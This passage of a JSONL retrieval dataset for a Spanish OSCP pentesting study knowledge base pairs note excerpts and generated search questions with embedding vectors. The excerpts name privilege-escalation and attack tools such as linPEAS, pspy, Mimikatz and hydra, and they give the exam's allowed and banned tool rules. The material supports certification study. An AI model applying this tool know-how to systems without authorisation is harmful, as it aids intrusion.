0.0037, 0.00082, 0.17101, 0.14404, 0.0805, 0.00684, 0.06955, 0.04614, -0.00988, 0.15517, 0.04569, -0.07029, 0.00843, -0.04943, 0.14839, 0.04182, 0.06367, -0.13062, -0.06039, -0.01457, 0.10801, 0.08767, -0.00136, -0.14066, -0.13068, -0.05117, -0.13818, 0.03234, -0.10563, -0.06733, -0.09159, -0.03056, -0.02862, 0.03567, -0.16934, 0.07563, -0.02325, -0.05181, 0.09285, 0.02528, -0.0528, 0.00835, -0.06382, 0.11508, -0.05375, -0.02998, 0.1256, 0.05021, 0.06133, 0.02779, 0.00481, 0.04893, -0.01416, 0.07096, -0.09659, -0.09035, 0.05741, 0.05542, 0.02685, -0.01717, 0.01494, -0.04926, -0.1237, -0.01816, -0.03047, -0.01267, -0.09752, 0.01047, -0.00089, -0.08018, 0.02304, -0.005, 0.0695, -0.04492, 0.00568, -0.09234, 0.07102, -0.02409, 0.06799, -0.06414, 0.11375, 0.04392, -0.02097, 0.06057, 0.02893, -0.01006, -0.10051, -0.08603, 0.0286, -0.02904, 0.07175, 0.02607, 0.06778, -0.13112, -0.01811, -0.03921, 0.02701, -0.00805, -0.00094, 0.02915, -0.02607, -0.00886, -0.05383, 9e-05, 0.08281, 0.01209, 0.01672, -0.03101, -0.06242, 0.02395, -0.08362, -0.04089, -0.08219, 0.00829, 0.0599, 0.02967, -0.09056, -0.03777, -0.05308, -0.00184, -0.01404, 0.03533, -0.05909, 0.00076, -0.03922, -0.00338, -0.07939, -0.02696, -0.10808, 0.02594, 0.03859, -0.07119, -0.0702, -0.01707, -0.06323, 0.01055, 0.03046, -0.07488, -0.0267, -0.16267, 0.02354, -0.0306, -0.00813, -0.01779, 0.03716, -0.05136, 0.02718, -0.05731, 0.01834, -0.0444, -0.08805, -0.00266, -0.02025, -0.0195, -0.05497, 0.03808, -0.03742, 0.02397, -0.01472, 0.05159, -0.00049, -0.00229, 0.00208, 0.03386, 0.00727, -0.01738, 0.01101, 0.05301, 0.06524, 0.01501, 0.00597, 0.06376, 0.03752, -0.03675, 0.0082, 0.06225, -0.021, 0.01118, 0.021, 0.06942, 0.03417, 0.09692, -0.00032, -0.00681, 0.00186, -0.07868, 0.0131, 0.00167, 0.04869, 0.15182, 0.00242, -0.04792, -0.01007, -0.05302, 0.02808, 0.00629, -9e-05, 0.0266, 0.07315, 0.05167, -0.02424, 0.03324, -0.03768, 0.03402, -0.01124, 0.03219, 0.05796, -0.00118, 0.01657, -0.04439, 0.03225, 0.05118, 0.00755, 0.00897, -0.00844, -0.0034, 0.02134, 0.02442, 0.00419, 0.06197, -0.03337, 0.01805, 0.02078, -0.03275, 0.02074, -0.01439, -0.07813, 0.02213, 0.00048, 0.05991, 0.00886, -0.00311, -0.01425]} -{"tipo": "pregunta", "herramienta": "Herramientas (Γ­ndice)", "perfil": "PENTESTERS", "fichero": "conocimiento/07 - Referencia/Herramientas (Γ­ndice).md", "tema": "referencia", "fuente": null, "licencia": null, "texto": "## En la vΓ­ctima Linux\n| Tool | Para quΓ© | Nota |\n|---|---|---|\n| linPEAS / LinEnum / LES / lse | enumeraciΓ³n de privesc | Privesc Linux |\n| pspy | espΓ­a procesos/cron sin root | Privesc Linux |\n\nRelacionado: searchsploit Β· Recursos pΓΊblicos Β· OSCP MOC", "indexar": "que programa sirve para espionar cron jobs o procesos en un sistema Linux", "v": [-0.01531, -0.04078, -0.10098, -0.26237, 0.0211, -0.26275, -0.10718, -0.01824, -0.07257, -0.04018, -0.08215, -0.04659, 0.0317, -0.0889, 0.05649, -0.10186, 0.0369, -0.10099, 0.02063, -0.0197, -0.18006, 0.04481, -0.06224, -0.05273, 0.02737, 0.07538, 0.042, -0.09926, -0.04716, 0.07354, -0.08714, 0.0523, 0.13383, 0.00657, -0.03575, 0.04125, 0.003, 0.08807, 0.0488, 0.14726, 0.07216, -0.08496, 0.00368, 0.04666, 0.00323, -0.12714, 0.06662, -0.00426, 0.06249, -0.12253, -0.01005, -0.03766, -0.05281, -0.02801, 0.08755, -0.09082, -0.02979, -0.14559, 0.00512, 0.06242, -0.08207, 0.06064, -0.03569, -0.06103, 0.11713, 0.01779, -0.00781, -0.07501, -0.07058, 0.0294, -0.0291, 0.09228, 0.00102, 0.03496, 0.06583, -0.04017, -0.06719, 0.03401, 0.04247, 0.01001, -0.00051, -0.00094, 0.00335, 0.16317, -0.08791, -0.0465, 0.02039, 0.09909, -0.0562, 0.07058, 0.031, 0.10727, 0.01901, 0.13353, 0.17623, -0.01073, 0.10985, 0.01224, -0.00899, 0.01724, -0.01387, -0.0537, -0.0875, 0.15425, -0.08036, 0.04181, 0.07907, 0.03367, 0.01487, -0.06323, 0.00676, 0.00348, -0.02434, 0.02039, -0.09017, -0.04574, -0.02091, 0.01414, 0.03153, -0.00278, -0.0683, 0.05119, -0.05011, 0.01763, 0.05309, -0.08144, 0.02509, 0.06537, -0.02333, -0.02191, 0.00892, -0.03422, -0.04669, 0.09045, 5e-05, -0.02575, 0.043, -0.01577, 0.01712, -0.03372, 9e-05, 0.08957, 0.03774, 0.01666, 0.11639, -0.02888, 0.1278, -0.0764, 0.04651, -0.08307, -0.05898, 0.00083, -0.00177, -0.03603, -0.10626, -0.09708, -0.00746, -0.03801, -0.03413, -0.02873, 0.01451, -0.00099, -0.00199, -0.01562, 0.01175, 0.00631, 0.035, 0.04003, 0.06513, 0.05196, -0.02667, 0.05296, 0.0509, -0.091, 0.02902, -0.04072, 0.03885, -0.07618, 0.03586, 0.03814, -0.06609, 0.07108, 0.08221, -0.00112, 0.01898, -0.01855, -0.03843, 0.06252, 0.00926, 0.02535, 0.04592, -0.00635, -0.00741, 0.00956, -0.02596, 0.05573, -0.0281, -0.03668, 0.02899, -0.02045, -0.03213, 0.04807, 0.03208, 0.00845, -0.00673, 0.09267, 0.0369, -0.00524, 0.03256, 0.07641, 0.0257, -0.00838, 0.03463, 0.02637, -0.04141, -0.01081, 0.00779, 0.04706, 0.05518, -0.0143, 0.01748, -0.04477, 0.06304, 0.01038, -0.02534, -0.12276, 0.01539, 0.03917, 0.03252, -0.02666, -0.00068, -0.04445, 0.01256, 0.02433, -0.01993, -0.05145, -0.03643, -0.02185, 0.02046, -0.0841, -0.03904, 0.06417, 0.02082, -0.07391, -0.02635, -0.04229, -0.01794, -0.03933, 0.01591, -0.05148, -0.07105, 0.03579, 0.00357, -0.02048, -0.01241, 0.03467]} -{"tipo": "pregunta", "herramienta": "Reglas de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reglas de herramientas.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "# Reglas de herramientas (examen)\n\n> QuΓ© puedes y quΓ© no puedes usar en el examen OSCP.", "indexar": "quΓ© herramienta sirve para practicar las reglas de uso en el examen OSCP", "v": [-0.02946, 0.05227, -0.08181, -0.24619, 0.06945, -0.2312, -0.07128, -0.02219, 0.04202, -0.09041, -0.1005, 0.00421, -0.04115, -0.08625, 0.08938, 0.03873, 0.06351, -0.05506, -0.00272, -0.00784, -0.09824, -0.10584, -0.13049, 0.09081, -0.01561, 0.07425, 0.0111, -0.07543, -0.14961, -0.01379, -0.0478, 0.13112, 0.08668, -0.13835, -0.10085, 0.02791, -0.05729, -0.08395, 0.03933, 0.18206, -0.0246, 0.067, -0.07054, 0.06713, 0.0961, 0.0987, 0.02797, 0.09197, -0.13397, 0.00142, 0.01424, -0.16242, -0.00634, -0.077, -0.04794, -0.09041, 0.07823, -0.13518, 0.03739, -0.14554, -0.0628, -0.05244, -0.02233, -0.01398, 0.02674, -0.04959, 0.01123, 0.02325, -0.09711, 0.07097, -0.03995, 0.08121, -0.00243, -0.02495, -0.08815, -0.08583, 0.0049, -0.02174, 0.14703, -0.09826, 0.02557, -0.08442, -0.09113, 0.01561, -0.10788, -0.07004, 0.08622, -0.03017, 0.01206, -0.06009, -0.0033, 0.14529, 0.04943, -0.05368, 0.08153, -0.1107, -0.03362, -0.01059, 0.0512, -0.02119, 0.1716, 0.01111, -0.06335, 0.00553, -0.10404, -0.01658, 0.04879, -0.03336, -0.05638, -0.04404, 0.03305, 0.06568, -0.08576, 0.03176, -0.00886, -0.01832, 0.03472, -0.02067, -0.05558, -0.0179, 0.01882, 0.02142, -0.02936, 0.02101, 0.05182, 0.02663, 0.04754, 0.10213, 0.00514, 0.02549, -0.00689, -0.05066, -0.11245, 0.07721, -0.0469, -0.05883, -0.04144, -0.06623, -0.04241, -0.04069, 0.04734, 0.04562, -0.1028, -0.08755, 0.02469, 0.00911, 0.03935, -0.04915, -0.0606, -0.01113, -0.00701, -0.05561, 0.00812, 0.0673, -0.06262, -0.00074, -0.01399, -0.01913, -0.05123, 0.0111, -0.02882, -0.03475, 0.06587, 0.00467, 0.05835, 0.02101, 0.00081, -0.01033, -0.00112, 0.02064, 0.04843, -0.00857, 0.02383, 0.01154, 0.05648, -0.03839, -0.04692, 0.01059, -0.03211, -0.0558, -0.0847, 0.05013, -0.05726, 0.02168, 0.05278, 0.01474, 0.03433, -0.00808, 0.04295, 0.03129, 0.01276, -0.00237, 0.0009, -0.07655, 0.01138, -0.00574, 0.02972, -0.04614, 0.01697, -0.03541, -0.04153, 0.00304, -0.03478, -0.06133, 0.09861, 0.03588, 0.02243, 0.00427, -0.03271, 0.03372, -0.0138, 0.00971, 0.0199, 0.01204, -0.00796, -0.01967, 0.01775, 0.08648, -0.01976, -0.03069, 0.01163, 0.02249, 0.03472, -0.01265, -0.01461, 0.06225, 0.00914, -0.00982, 0.03619, 0.022, 0.04051, -0.02412, 0.00098, 0.01472, 0.05119, -0.02522, 0.05919, 0.01001, -0.03513, -0.07422, -0.00881, 0.03414, 0.00453, -0.05328, -0.02982, -0.00808, 0.02541, -0.04742, -0.04389, -0.05934, -0.00644, -0.02697, 0.09985, -0.01845, -0.02113, 0.01661]} -{"tipo": "pregunta", "herramienta": "Reglas de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reglas de herramientas.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "# Reglas de herramientas (examen)\n\n> QuΓ© puedes y quΓ© no puedes usar en el examen OSCP.", "indexar": "con que puedo montar un entorno simulado del examen OSCP", "v": [0.03019, 0.04039, -0.15988, -0.18623, -0.09755, -0.14177, -0.04756, 0.05198, -0.09775, -0.09092, -0.05215, 0.07134, 0.01866, -0.01493, 0.00675, 0.12268, 0.05458, -0.00109, -0.03473, 0.04267, -0.01493, -0.13482, -0.02665, 0.03379, 0.14995, 0.13232, -0.08701, -0.04372, -0.0004, -0.12716, 0.07015, 0.19873, 0.09465, -0.06498, -0.02171, -0.08934, -0.03993, -0.06599, 0.02812, 0.07864, 0.02863, 0.06521, 0.00098, 0.0794, 0.07649, 0.00913, 0.03376, -0.00429, -0.03326, -0.14866, 0.04056, -0.09621, -0.08748, -0.10155, -0.02063, -0.06323, 0.12398, -0.06585, 0.20352, -0.11788, 0.08775, 0.07357, 0.0493, 0.00487, 0.08355, 0.01742, 0.00063, 0.14444, -0.07819, 0.01522, -0.08358, -0.02158, -0.03291, -0.00676, -0.09814, -0.11185, -0.05397, -0.01912, 0.14701, -0.01935, 0.02402, -0.05907, 0.04574, 0.11507, -0.13441, -0.0772, -0.01456, 0.00023, 0.03308, -0.0299, 0.01709, 0.05575, 0.09657, 0.03325, 0.01968, -0.09625, 0.07594, 0.01204, -0.02415, -0.04571, -0.05394, 0.0839, -0.05624, 0.06416, -0.05978, 0.0748, 0.07688, -0.05731, 0.05291, -0.05239, -0.01135, 0.01881, -0.1105, 0.00675, -0.03216, -0.09886, 0.04104, 0.02917, 0.04329, -0.05688, 0.0269, 0.06381, 0.02201, 0.00026, -0.01968, 0.06828, 0.12309, 0.0621, 0.01242, 0.04422, -0.02859, 0.02069, -0.08532, -0.00285, -0.03101, -0.04434, -0.07783, -0.09644, 0.03261, -0.01409, 0.03859, 0.056, 0.00573, -0.0959, 0.00761, 0.0814, -0.0365, -0.0587, -0.00756, -0.01484, -0.00336, 0.0489, 0.05667, 0.06188, -0.10703, -0.07258, 0.00718, 0.01526, 0.0742, 0.06583, -0.01469, 0.00972, 0.00279, -0.00444, 0.01431, 0.01807, -0.02715, -0.07995, 0.00419, -0.02822, -0.07342, -0.00112, 0.00849, -0.01558, 0.11171, 0.071, 0.02702, -0.02747, -0.03794, -0.02193, -0.09621, 0.02797, 0.01427, 0.01458, 0.02124, 0.02709, 0.05245, 0.04171, 0.06033, 0.00465, 0.02545, 0.00317, -0.00841, -0.01704, 0.06219, -0.02793, 0.03256, -0.02571, 0.0233, -0.00709, -0.03247, -0.04311, -0.02358, -0.0929, 0.01882, 0.02814, 0.01092, 0.12722, 0.00249, 0.05544, -0.00929, -0.02693, 0.05697, -0.03406, 0.03035, 0.02819, 0.05004, 0.06247, -0.03454, -0.01488, -0.03519, 0.04221, 0.06939, 0.02412, -0.02208, 0.021, -0.01058, 0.02438, 0.05633, 0.0036, 0.0419, -0.00746, 0.04214, -0.01057, 0.04519, 0.03585, 0.04126, 0.02776, -0.06227, -0.03569, 0.00921, 0.05063, -0.02836, -0.07429, -0.06618, 0.01046, -0.02835, -0.03153, 0.0287, -0.04565, -0.0243, -0.0402, 0.02721, -0.04727, -0.03281, 0.00914]} -{"tipo": "pregunta", "herramienta": "Reglas de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reglas de herramientas.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## βœ… Permitido\n- Nmap + NSE, `enum4linux`, `smbclient`, `rpcclient`, NetExec/CrackMapExec (SMB).\n- Mimikatz, Impacket, BloodHound, Pivoting ligolo-ng.\n- `nikto`, `whatweb`, searchsploit, `hydra`, gobuster/feroxbuster/ffuf (Content discovery).\n- Burp Suite Community (proxy manual; el scanner activo estΓ‘ prohibido, pero no lo necesitas).\n- **Tus propios scripts** (copy-paste permitido).", "indexar": "ΒΏquΓ© herramientas sirven para descubrir servicios y vulnerabilidades en un servidor?", "v": [0.03593, 0.01448, -0.14649, -0.18415, -0.03819, -0.13642, -0.06159, -0.13193, 0.11198, -0.09865, -0.08577, -0.09726, -0.04162, -0.07933, 0.02916, 0.10906, 0.1404, -0.15467, 0.10839, 0.07453, 0.00373, 0.05572, -0.01853, -0.02212, -0.15231, 0.00616, 0.06198, -0.08775, -0.09371, 0.03457, -0.0363, -0.07792, 0.01434, 0.00145, -0.03061, 0.00061, -0.00755, 0.12166, 0.04, 0.06846, 0.11809, -0.02846, 0.02019, 0.02602, 0.05836, -0.03242, -0.04332, -0.10058, 0.03601, 0.09365, -0.09328, -0.11942, -0.16943, -0.03999, -0.03891, -0.02496, 0.09296, -0.1305, 0.04458, -0.06489, -0.17749, 0.01595, -0.04094, -0.0144, 0.09961, -0.11055, -0.07691, 0.01063, -0.0861, 0.06843, -0.03809, -0.01918, 0.02972, -0.03983, -0.04969, -0.01602, 0.00354, 0.00794, 0.0251, 0.06643, 0.04246, 0.14837, -0.0339, 0.06726, -0.12985, -0.06943, 0.07829, 0.01391, 0.0789, -0.06268, 0.13212, 0.15607, -0.09972, 0.06832, -0.06073, 0.03032, 0.13806, -0.07891, -0.02307, -0.0217, 0.06435, 0.00732, -0.00146, 0.07154, -0.03949, 0.10174, 0.02599, -0.02668, 0.00296, -0.05178, 0.00853, 0.01464, -0.0319, -0.00115, -0.0334, -0.03193, 0.01615, -0.03154, 0.06355, 0.0235, -0.01328, -0.01604, -0.00085, 0.05401, 0.03045, -0.04725, 0.02363, -0.02625, 0.03584, -0.0883, 0.05016, -0.07954, -0.09021, 0.02896, 0.03775, 0.00416, 0.11166, -0.10263, -0.04628, -0.02649, 0.04877, -0.00905, -0.03399, 0.01344, 0.08335, 0.04387, 0.10287, -0.06112, -0.04792, 0.03133, -0.0013, -0.04477, -0.05349, 0.03782, -0.07117, -0.06156, -0.02633, -0.06261, -0.12904, 0.04774, 0.04824, 0.02849, 0.05969, 0.07585, -0.00161, -0.00654, 0.07733, 0.06612, 0.10305, 0.03487, -0.02002, 0.05077, 0.06981, -0.0265, 0.00554, -0.02849, -0.04757, -0.04686, 0.02169, 0.01916, 0.01481, -0.04665, -0.03503, 0.01666, -0.0129, -0.00277, 0.0398, -0.05671, -0.01223, 0.02529, -0.04736, -0.04856, -0.04657, 0.0246, 0.07022, -0.03633, -0.00908, 0.00279, -0.07301, -0.05847, -0.04444, -0.01836, -0.06576, -0.00391, 0.00975, 0.0061, -0.02828, 0.00429, -0.00762, 0.04678, -0.04223, 0.01432, 0.1191, -0.07107, -0.04798, -0.03779, 0.00605, 0.00508, 0.00485, -0.03536, -0.04128, -0.0373, 0.00647, 0.00473, 0.04687, 0.02239, 0.00732, -0.04918, 0.03713, -0.00223, 0.02354, -0.04054, -0.06237, 0.01722, -0.00324, -0.07983, 0.02716, -0.0396, -0.02117, -0.04102, 0.01498, 0.05269, 0.00904, -0.05129, -0.01115, -0.061, 0.01056, -0.02997, -0.0711, -0.01303, -0.03385, -0.00719, 0.02096, -0.03077, 0.01153, -0.05889]} -{"tipo": "pregunta", "herramienta": "Reglas de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reglas de herramientas.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## βœ… Permitido\n- Nmap + NSE, `enum4linux`, `smbclient`, `rpcclient`, NetExec/CrackMapExec (SMB).\n- Mimikatz, Impacket, BloodHound, Pivoting ligolo-ng.\n- `nikto`, `whatweb`, searchsploit, `hydra`, gobuster/feroxbuster/ffuf (Content discovery).\n- Burp Suite Community (proxy manual; el scanner activo estΓ‘ prohibido, pero no lo necesitas).\n- **Tus propios scripts** (copy-paste permitido).", "indexar": "con quΓ© puedo escanear contenido web y buscar informaciΓ³n sensible?", "v": [-0.15748, 0.04736, -0.24656, -0.02685, 0.06805, -0.16574, -0.0933, -0.15723, -0.10913, -0.07567, -0.0828, 0.0043, -0.03332, -0.07086, 0.05266, 0.10064, 0.12803, -0.03193, 0.0375, 0.05049, 0.04846, -0.11809, -0.09009, -0.01866, -0.15578, -0.12612, -0.10918, 0.02673, -0.02549, 0.05362, -0.10618, 0.12725, 0.02799, 0.13119, -0.08996, 0.10503, 0.03319, 0.04975, 0.01251, -0.1186, -0.02218, -0.03352, -0.10631, -0.01451, -0.0553, -0.03216, -0.10664, -0.00508, -0.00679, -0.03062, -0.09662, -0.0452, -0.0697, 0.00154, -0.02541, 0.03088, 0.16691, -0.04911, 0.13374, -0.06041, -0.04685, 0.00916, 0.0372, -0.04883, -0.0434, 0.06544, 0.1486, 0.09694, -0.01869, -0.0104, -0.04886, -0.04166, 0.02501, -0.02456, 0.07396, -0.03128, 0.03504, 0.09785, 0.03885, 0.06373, 0.03912, 0.00513, -0.09355, 0.03071, 0.00838, -0.05261, 0.03752, -0.12609, -0.02486, -0.14423, 0.10567, 0.0699, -0.06618, 0.06477, -0.10852, -0.02703, 0.04434, -0.02234, -0.0464, 0.01174, -0.09617, -0.01855, -0.09346, 0.06356, 0.04276, 0.0361, 0.04365, -0.01926, -0.04418, -0.05494, -0.02936, -0.02023, -0.07844, -0.06801, -0.07745, -0.00921, -0.10772, -0.01867, 0.02426, -0.04102, -0.02213, 0.03579, -0.02563, -0.03804, 0.05309, 0.03118, 0.07483, 0.0363, 0.0386, -0.04626, -0.06393, -0.05543, -0.08855, -0.05718, 0.05618, 0.00989, -0.04239, -0.02012, 0.04339, 0.01316, -0.01518, -0.05894, -0.09959, 0.04556, 0.01005, -0.04851, 0.01004, -0.01841, -0.07975, -0.03565, -0.03422, -0.02411, -0.00483, 0.04596, -0.04542, 0.0063, 0.01082, -0.08767, -0.06395, -0.00024, -0.09185, 0.04694, -0.06327, -0.0015, -0.02236, 0.0119, -0.10475, 0.01045, -0.01968, 0.00798, -0.08414, 0.09689, -0.03765, -0.15295, 2e-05, -0.06244, -0.07189, -0.06147, 0.01683, -0.04102, -0.03638, -0.03409, 0.02794, 0.0083, -0.01837, -0.05107, -0.00274, -0.04329, -0.04083, 0.02254, 0.01161, 0.03836, 0.00492, 0.00954, 0.02725, -0.02089, -0.02816, -0.02081, 0.04844, -0.01108, -0.05726, -0.00328, 0.0296, -0.03352, -0.02401, 0.00746, -0.01779, -0.04287, -0.02229, 0.01186, 0.00726, -0.04665, 0.05465, -0.07923, -0.08398, 0.03492, 0.06347, 0.00881, -0.03264, 0.07148, 0.0299, 0.05205, 0.03365, 0.03862, 0.03364, -0.00196, 0.01336, -0.03344, 0.00887, -0.01914, -0.0324, 0.00178, -0.06864, -0.03555, 0.03567, -0.02498, 0.02367, -0.00667, -0.06646, -0.04612, 0.01637, 0.03936, -0.02784, 0.02376, 2e-05, -0.07964, -0.06991, 0.02868, -0.03927, -0.05994, -0.03011, -0.00284, 0.00586, -0.09781, 0.05273, -0.0253]} -{"tipo": "pregunta", "herramienta": "Reglas de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reglas de herramientas.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## βœ… Permitido\n- Nmap + NSE, `enum4linux`, `smbclient`, `rpcclient`, NetExec/CrackMapExec (SMB).\n- Mimikatz, Impacket, BloodHound, Pivoting ligolo-ng.\n- `nikto`, `whatweb`, searchsploit, `hydra`, gobuster/feroxbuster/ffuf (Content discovery).\n- Burp Suite Community (proxy manual; el scanner activo estΓ‘ prohibido, pero no lo necesitas).\n- **Tus propios scripts** (copy-paste permitido).", "indexar": "hay alguna alternativa libre a los scanners de Burp Suite para pruebas manuales?", "v": [0.07945, -0.01378, -0.14522, -0.22592, -0.24184, -0.11954, -0.05405, -0.15134, -0.04166, -0.05795, -0.12178, 0.00932, 0.03316, -0.00752, -0.01685, -0.03838, -0.04356, -0.06704, 0.04964, 0.00333, 0.02449, 0.08549, -0.14819, -0.02333, 0.00482, -0.0156, -0.05058, -0.02481, -0.03494, 0.04666, 0.00901, 0.09471, 0.08701, 0.01227, -0.1497, -0.06512, 0.0673, 0.02612, 0.13687, 0.01334, 0.09091, -0.04909, -0.04406, 0.07284, -0.01587, -0.07058, -0.06487, 0.13528, -0.01449, 0.02859, -0.11167, -0.08949, -0.02557, 0.0565, -0.0194, -0.14701, 0.07574, 0.03725, -0.00255, -0.06262, 0.05061, 0.05852, 0.04765, -0.05739, 0.04119, 0.00433, 0.05162, -0.06297, -0.11649, 0.02965, -0.09226, -0.00402, 0.06199, 0.01674, -0.243, -0.10244, -0.08272, -0.04335, 0.04477, 0.06532, 0.0387, -0.04626, -0.07135, 0.01334, -0.06638, -0.0918, -0.00191, -0.08058, -0.01671, 0.02854, 0.04678, 0.01319, 0.06265, 0.11217, 0.07587, -0.02923, 0.10889, 0.12932, 0.03648, 0.04503, 0.12577, -0.00702, -0.04255, 0.04518, -0.07558, -0.03841, -0.05254, 0.04867, -0.00872, 0.03696, -0.02224, 0.07381, -0.07492, 0.00523, -0.14642, -0.02394, 0.01998, -0.01375, -0.05501, -0.02032, -0.02189, -0.03135, -0.06371, -0.0788, -0.03158, 0.00552, 0.0586, 0.04514, 0.0094, 0.05613, 0.03033, 0.02956, -0.12, -0.00069, -0.07515, 0.01835, 0.02517, -0.06364, 0.01723, -0.01837, -0.05013, 0.01946, 0.01284, -0.01689, 0.05209, 0.00799, -0.01724, -0.04407, 0.00118, -0.05375, -0.0646, -0.03422, -0.03476, 0.11126, -0.06096, 0.02032, -0.00648, -0.01013, -0.02895, 0.0572, -0.02962, -0.03064, -0.06928, 0.0243, 0.00789, 0.01161, 0.01751, -0.03649, -0.04581, 0.05415, -0.00659, 0.08029, -0.00468, -0.03092, 0.1179, 0.05875, 0.04294, -0.07382, -0.01311, -0.08022, 0.03637, 0.08817, -0.03078, -0.02039, 0.05892, -0.03569, -0.01044, 0.04355, 0.11977, 0.01477, -0.0076, 0.01062, -0.05491, -0.03847, 0.03091, 0.04221, -0.01987, -0.07563, -0.03705, -0.0571, -0.1109, -0.05757, -0.03109, -0.03521, -0.02834, 0.04519, -0.01066, 0.04165, 0.02083, 0.05223, 0.02431, 0.02637, 0.09001, -0.03815, -0.11862, 0.03738, 0.02361, 0.0279, -0.025, -0.03145, 0.01364, -0.00293, -0.00569, 0.03849, -0.03277, 0.06076, 0.04757, 0.0239, 0.03538, 0.01861, 0.04504, 0.04312, -0.00162, 0.05174, -0.01345, 0.02546, 0.02371, 0.08234, 0.00096, -0.075, 0.01722, 0.04726, -0.04147, -0.02485, -0.05279, 0.00094, -0.07495, -0.03157, -0.01968, -0.00914, -0.01489, 0.00333, -0.00822, 0.0053, 0.03407, 0.00743]} -{"tipo": "pregunta", "herramienta": "Reglas de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reglas de herramientas.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## β›” Prohibido\n- **Metasploit / Meterpreter β†’ solo en UNA mΓ‘quina.**\n - Solo el **foothold inicial** cuenta como \"uso\"; post-explotaciΓ³n con meterpreter NO cuenta.\n- ExplotaciΓ³n automΓ‘tica: `sqlmap` en modo auto, autopwn.\n- EscΓ‘neres de vulnerabilidades masivos: **Nessus, OpenVAS, Nexpose, Core Impact**.\n- IA durante el examen.", "indexar": "que herramientas permiten usar Metasploit solo para obtener un acceso inicial en una sola mΓ‘quina?", "v": [-0.05423, 0.0584, -0.20835, -0.14729, -0.06111, -0.10478, -0.15713, -0.11514, -0.12938, -0.01046, -0.21238, -0.02734, 0.04441, -0.01517, 0.07036, 0.00703, 0.05355, -0.12478, -0.04747, -0.07403, -0.02784, 0.00168, -0.11261, -0.12054, -0.06278, 0.09152, 0.07021, -0.0112, -0.18394, 0.06886, -0.02765, 0.0157, 0.03052, -0.03741, -0.02281, -0.20478, -0.03121, 0.06016, 0.13861, 0.02795, -0.00391, 0.05105, -0.08612, 0.08637, 0.17864, -0.02521, 0.03627, 0.02738, -0.11073, 0.10443, -0.03117, -0.09042, -0.10691, 0.03892, -0.06996, -0.13804, 0.21889, -0.01333, -0.0506, -0.03344, -0.08093, -0.00389, -0.0627, 0.09176, -0.0347, -0.0042, -0.01251, -0.03465, -0.09093, 0.06496, -0.07859, -0.02337, 0.00512, -0.067, 0.08754, 0.01355, -0.04766, -0.02623, 0.11974, -0.00465, -0.03351, -0.01582, -0.09563, -0.01059, -0.07637, -0.05161, 0.07399, -0.0464, 0.0739, -0.08577, 0.06108, 0.0654, -0.02, -0.07262, 0.04945, -0.05361, -0.02831, -0.00414, -0.0294, 0.04033, 0.12662, -0.0619, 0.04533, 0.10386, -0.05991, -0.00646, 0.04681, -0.03762, -0.06479, -0.09365, 0.01084, 0.04702, 0.0013, -0.00472, -0.02853, 0.07011, -0.00776, -0.11509, -0.08485, -0.09834, 0.01494, -0.00845, 0.03374, -0.06064, 0.01777, -0.00838, -0.03423, -0.03849, -0.00205, -0.08573, 0.05829, 0.03045, -0.04465, 0.04001, -0.02866, 0.01399, 0.06607, -0.10318, -0.04218, -0.04802, 0.0594, 0.06847, -0.09117, -0.1013, 0.02052, -0.021, -0.00598, -0.06966, 0.00737, -0.05417, 0.07632, -0.08022, 0.02318, 0.01636, -0.08944, 0.00475, -0.07138, 0.01429, -0.06302, 0.01001, -0.03752, -0.01344, -0.09948, 0.00635, -0.00379, -0.01653, 0.04094, 0.00924, -0.02407, 0.0237, 0.03194, 0.06637, 0.06431, 0.0515, -0.01014, 0.00178, -0.03638, -0.02615, -0.0404, 0.01908, -0.00178, 0.00711, -0.00355, -0.05525, -0.01263, -0.0014, 0.01534, -0.02144, -0.00128, 0.03861, -0.00566, 0.03172, -0.03299, -0.00224, 0.06366, 0.06478, -0.03331, 0.01441, 0.01596, -0.0228, -0.01629, 0.01877, -0.05269, -0.06796, 0.05983, 0.01836, -0.08406, -0.05509, -0.05584, 0.02536, 0.02908, -0.02225, 0.05143, -0.03182, -0.06255, 0.00377, -0.03054, 0.04419, -0.05967, -0.02427, 0.02064, 0.00723, 0.01945, 0.02777, 0.02167, -0.00872, 0.02449, -0.01862, 0.03473, 0.00695, -0.04248, 0.01178, -0.01533, -0.00326, 0.00218, -0.02632, 0.0295, -0.04291, -0.05481, 0.02028, 0.0057, 0.05581, 0.03266, 0.00447, -0.02928, -0.02953, -0.04057, -0.01236, -0.05865, -0.03497, -0.02295, -0.00801, 0.02792, -0.0084, -0.0118, 0.03627]} -{"tipo": "pregunta", "herramienta": "Reglas de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reglas de herramientas.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## β›” Prohibido\n- **Metasploit / Meterpreter β†’ solo en UNA mΓ‘quina.**\n - Solo el **foothold inicial** cuenta como \"uso\"; post-explotaciΓ³n con meterpreter NO cuenta.\n- ExplotaciΓ³n automΓ‘tica: `sqlmap` en modo auto, autopwn.\n- EscΓ‘neres de vulnerabilidades masivos: **Nessus, OpenVAS, Nexpose, Core Impact**.\n- IA durante el examen.", "indexar": "con quΓ© programas puedo realizar escaneos de vulnerabilidades sin que se consideren masivos ni automΓ‘ticos?", "v": [0.19695, 0.04722, -0.18936, 0.10918, 0.03663, 0.02302, -0.04082, -0.11538, -0.19253, -0.08972, 0.01356, 0.03287, 0.00555, -0.06577, 0.16498, 0.16422, 0.08438, -0.07163, 0.03678, 0.12153, 0.012, -0.23252, 0.0181, 0.03474, -0.06357, 0.0754, -0.02621, -0.01394, -0.07604, -0.00639, -0.0499, 0.11165, 0.08157, -0.06468, 0.05395, 0.04139, -0.01709, 0.04847, 0.04856, 0.05817, 0.09574, 0.04543, -0.18687, -0.05563, 0.06322, -0.12317, -0.1025, 0.01815, -0.08607, -0.06741, -0.05813, -0.0238, -0.0827, -0.05101, 0.04001, -0.09869, 0.09961, -0.0254, 